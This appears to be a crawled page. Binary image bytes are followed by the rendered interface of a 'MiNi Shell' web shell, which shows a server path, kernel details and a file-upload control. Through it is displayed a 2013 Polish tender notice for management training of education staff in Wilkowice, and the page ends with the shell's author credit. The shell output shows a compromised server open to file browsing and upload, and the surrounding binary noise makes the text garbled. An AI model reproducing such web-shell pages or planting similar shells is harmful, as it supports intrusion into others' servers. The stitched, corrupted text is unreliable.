JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130905/359860-N-2013.html

<p class="kh_header"><b>Wilkowice: Szkolenia podnoszące kwalifikacje kadry zarządzającej systemem oświaty dla uczestniczek i uczestników projektu pn.: Wilkowice - skuteczny menedżer w eduk@cji</b><br>
<b>Numer ogłoszenia: 359860 - 2013; data zamieszczenia: 05.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Szkół i Przedszkoli w Wilkowicach , ul. Wyzwolenia 25, 43-365 Wilkowice, woj. śląskie, tel. 33 499 00 77 wew. 207-209, faks 33 499 00 77 wew. 209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zosip-wilkowice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia podnoszące kwalifikacje kadry zarządzającej systemem oświaty dla uczestniczek i uczestników projektu pn.: Wilkowice - skuteczny menedżer w eduk@cji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń podnoszących kwalifikacje kadry zarządzającej systemem oświaty z zakresu psychospołecznych aspektów zarządzania dla uczestniczek i uczestników projektu pn. Wilkowice - skuteczny menedżer w eduk@cji. Okres realizacji projektu: 01.09.2013 r. - 30.06.2014 r.
2.Przedmiot zamówienia składa się z 1 części z wyodrębnionymi 6 zadaniami:
1) Profesjonalna komunikacja i zarządzanie w oświacie 
- dla 21 osób, w podziale na 4 grupy, łącznie 160 godzin szkoleniowych
- każda grupa 5 spotkań po 8 godzin szkoleniowych
- zagadnienia: jak komunikować się w miejscu pracy, skuteczna komunikacja, komunikacja werbalna i niewerbalna, zarządzanie oświatą, wdrożenie rozwiązań biznesowych do sektora finansów publicznych w aspekcie racjonalizacji procesu zarządzania placówką, motywowanie pracowników
2) Budowanie wizerunku własnego i placówki 
- dla 18 osób, w podziale na 3 grupy, łącznie 120 godzin szkoleniowych
- każda grupa 5 spotkań po 8 godzin szkoleniowych
- zagadnienia: wizerunek skutecznego menedżera, wystąpienia publiczne, kontakty z mediami, kontakty z interesariuszami, budowanie wizerunku placówki - narzędzia i metody, psychologia sukcesu
3) Kształtowanie umiejętności lidera i przywódczych 
- dla 7 osób, tj. dla 1 grupy, łącznie 40 godzin szkoleniowych
- 5 spotkań po 8 godzin szkoleniowych
- zagadnienia: cechy lidera, jak stać się liderem, jak zjednać sobie ludzi, jak być przywódcą i nie stracić kontaktu z podwładnymi, style i modele zarządzania, różnica między rządzeniem a zarządzaniem, tworzenie systemów motywowania poza finansowego
4) Socjotechnika w negocjacjach 
- dla 9 osób, tj. dla 1 grupy, łącznie 40 godzin szkoleniowych
- 5 spotkań po 8 godzin szkoleniowych
- zagadnienia: socjotechniki negocjacyjne, metody prowadzenia negocjacji, skuteczne negocjacje, BATNA, triki negocjacyjne, etyka negocjacji
5) Doskonalenie warsztatu pracy dyrektora placówki oświatowej (z wykorzystaniem komunikacji społecznej, elementów zarządzania, języka ciała i NLP) 
- dla 14 osób, w podziale na 2 grupy, łącznie 80 godzin szkoleniowych
- każda grupa 5 spotkań po 8 godzin szkoleniowych
- zagadnienia: komunikacja społeczna, elementy zarządzania, język ciała, NLP - Neuro Lingwstyczne Programowanie, budowanie systemu obiegu informacji, wdrażanie zmian, przełamywanie oporu przed zmianą
6) Asertywność, zarządzanie czasem, radzenie sobie ze stresem 
- dla 21 osób, w podziale na 4 grupy, łącznie 160 godzin szkoleniowych.
- każda grupa 5 spotkań po 8 godzin szkoleniowych
- zagadnienia: postawa asertywna, zarządzanie czasem, zarządzanie sobą w czasie, priorytetyzacja zadań, metody radzenia sobie ze stresem i niwelowania jego negatywnych skutków
3. godzina szkoleniowa to godzina trwająca dokładnie 45 minut.
4. Harmonogram realizacji szkoleń ustalany będzie każdorazowo przez Zamawiającego z Wykonawcą. Zakłada się, iż:
a) w roku 2013 zrealizowane będą następujące szkolenia:
- Profesjonalna komunikacja i zarządzanie w oświacie; 
- Budowanie wizerunku własnego i placówki;
b) w roku 2014 zrealizowane będą następujące szkolenia:
- Kształtowanie umiejętności lidera i przywódczych; 
- Socjotechnika w negocjacjach; 
- Doskonalenie warsztatu pracy dyrektora placówki oświatowej (z wykorzystaniem komunikacji społecznej, elementów zarządzania, języka ciała i NLP); 
- Asertywność, zarządzanie czasem, radzenie sobie ze stresem.
5. W projekcie uczestniczyć będzie 25 osób, zatem część z nich uczestniczyć będzie więcej niż w jednym szkoleniu, co powoduje konieczność ustalenia harmonogramu szkoleń, tak aby terminy zajęć w poszczególnych blokach szkoleniowych nie nakładały się na siebie. Dopuszcza się możliwość realizacji równolegle szkoleń z danego bloku tematycznego dla kilku grup.
6. Wszystkie szkolenia będą odbywały się w dni robocze w wynajętych przez Wykonawcę salach zajęciowych zlokalizowanych w odległości do 15 km od siedziby Zamawiającego (trasa przejazdu). Sale zajęciowe winny posiadać odpowiednią powierzchnię oraz wyposażenie, a także spełniać wymagania określone w odpowiednich przepisach prawa, co winno zagwarantować sprawną i efektywną realizację szkoleń.  Liczebność grup dobrana została pod kątem jak największej efektywności i indywidualizacji wsparcia. 
7. Z uwagi na konstrukcję budżetu projektu (wynagrodzenia osób uczestniczących w szkoleniach stanowią wkład własny Beneficjenta) zajęcia winny odbywać się w godzinach pracy placówek oświatowych dla których organem prowadzącym jest Gmina Wilkowice (co do zasady w przedziale godzinowym od 07:00 do 16:00), średnio raz w tygodniu, przy czym dopuszcza się możliwość zintensyfikowania harmonogramu realizacji szkolenia (np. 2 dni w tygodniu).
8. Dla każdego zadania Wykonawca opracowuje oraz przekazuje materiały szkoleniowe w ilości wynikającej z liczby osób przewidzianych do udziału w danym szkoleniu oraz dodatkowy egzemplarz dla Zamawiającego (Zamawiający otrzymuje dodatkowy egzemplarz materiałów szkoleniowych dla każdej z grup, np. Zadanie nr 1 realizowane jest w 4 grupach, zatem Zamawiający otrzymuje 4 dodatkowe egzemplarze materiałów szkoleniowych
9. Wykonawca zapewnia catering dla uczestniczek i uczestników szkolenia w każdym dniu szkolenia, w ilości odpowiadającej ilości osób uczestniczących w danym dniu szkolenia, przy czym catering każdego dnia szkolenia obejmuje serwis kawowy oraz ciepły posiłek z dodatkami, tj.
- Ziemniaki lub ryż lub makaron lub kasza gryczana - 200 gramów, 
-  Sztuka mięsa bez sosu 170 gramów lub sztuka mięsa z sosem 190 gramów lub kotlet schabowy 100 gramów lub ryba bez panierki 150 gramów lub ryba z panierką 170 gramów  lub  udziec  z  kurczaka  170  gramów  lub  kotlet  mielony  150  gramów  lub gulasz potrawka 200 gramów lub wegetariański zamiennik o gramaturze 150 gramów (jeżeli Zamawiający przekaże taką informację Wykonawcy) 
-  Surówka warzywna 100 gramów lub warzywa gotowane 150 gramów. 
-  Sok owocowy 100% - 200 mililitrów. 
-  Deser: ciasto lub drobne ciasteczka - 200 gramów
- Kawa parzona lub rozpuszczalna lub herbata - 220 mililitrów wraz z dodatkami, tj. cukier, mleko do kawy, cytryna
10. Dodatkowo w ramach zapewnienia cateringu zobowiązuje się Wykonawcę do:
- świadczenie usług cateringowych, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,  
- przestrzeganie  przepisów  prawnych  w  zakresie  przechowywania  i przygotowywania artykułów  spożywczych  (m.  in.  ustawy  z  dnia  25  sierpnia  2006 r.  o  bezpieczeństwie żywności i żywienia Dz. U. nr 171 poz. 1125 ze zm.),  
- estetyczne podawanie posiłków,  
- dostarczanie  posiłków  na  miejsce  realizacji zajęć  w uzgodnionym terminie i o uzgodnionej godzinie,  
- zebranie  naczyń  oraz  resztek  pokonsumpcyjnych  najpóźniej  30  min.  po  zakończeniu spotkania,
11. Wykonawca opracowuje oraz dostarcza zaświadczenia o ukończeniu szkolenia (oryginał + kserokopia).
12. Wykonawca przeprowadza testy wiedzy na początku i na zakończenie każdego szkolenia.
13. Wykonawca prowadzi szkolenia metodą aktywną, np. warsztaty, dyskusja, ćwiczenia i pasywną np. prezentacja multimedialna z wykorzystaniem nowoczesnych technologii.
14. Szkolenia w 100% finansowane ze środków publicznych. Celem szkoleń jest podnoszenie kwalifikacji zawodowych, tematyka szkoleń jest nierozerwalnie związana z zajmowanym stanowiskiem/wykonywanym zawodem.
Nomenklatura wg Wspólnego Słownika Zamówień (Kod CPV):
80.50.00.00-9	Usługi szkoleniowe.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielania zamówień uzupełniających o wartości wynoszącej do 50 % szacunkowej wartości zamówienia w zakresie tożsamym z przedmiotem niniejszego zamówienia (szkolenia z zakresu psychospołecznych aspektów zarządzania).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania tj. posiadają aktualny na rok 2013 wpis do Rejestru Instytucji Szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. dysponują lub na czas realizacji niniejszego zamówienia dysponować będą minimum 4 trenerami zdolnymi do prowadzenia szkoleń przewidzianych do realizacji w ramach niniejszego postępowania, tj. przeprowadzili co najmniej 40 godzin szkoleń/zajęć zbieżnych z tematyką szkoleń przewidzianych do realizacji w ramach niniejszego postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. dysponują lub na czas realizacji niniejszego zamówienia dysponować będą minimum 4 trenerami zdolnymi do prowadzenia szkoleń przewidzianych do realizacji w ramach niniejszego postępowania, tj. przeprowadzili co najmniej 40 godzin szkoleń/zajęć zbieżnych z tematyką szkoleń przewidzianych do realizacji w ramach niniejszego postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. dysponują lub na czas realizacji niniejszego zamówienia dysponować będą minimum 4 trenerami zdolnymi do prowadzenia szkoleń przewidzianych do realizacji w ramach niniejszego postępowania, tj. przeprowadzili co najmniej 40 godzin szkoleń/zajęć zbieżnych z tematyką szkoleń przewidzianych do realizacji w ramach niniejszego postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Formularz ofertowy - załącznik nr 1 do SIWZ 
- Pełnomocnictwo - jeśli oferta jest składana przez pełnomocnika</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ze względu na szczególne okoliczności zmiana osób odpowiedzialnych za realizację zamówienia pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zosip-wilkowice.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Szkół i Przedszkoli w Wilkowicach
ul. Wyzwolenia 25
43-365 Wilkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2013 godzina 11:30, miejsce: Zespół Obsługi Szkół i Przedszkoli w Wilkowicach
ul. Wyzwolenia 25
43-365 Wilkowice  
pokój nr 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 2.	Zadanie współfinansowane będzie przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach projektu pn.: Wilkowice - skuteczny menedżer w eduk@cji realizowanego przez Zespół Obsługi Szkół i Przedszkoli w Wilkowicach w ramach Działania 9.4 Wysoko wykwalifikowane kadry systemu oświaty, Programu Operacyjnego Kapitał Ludzki, numer projektu: POKL.09.04.00-24-009/12..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com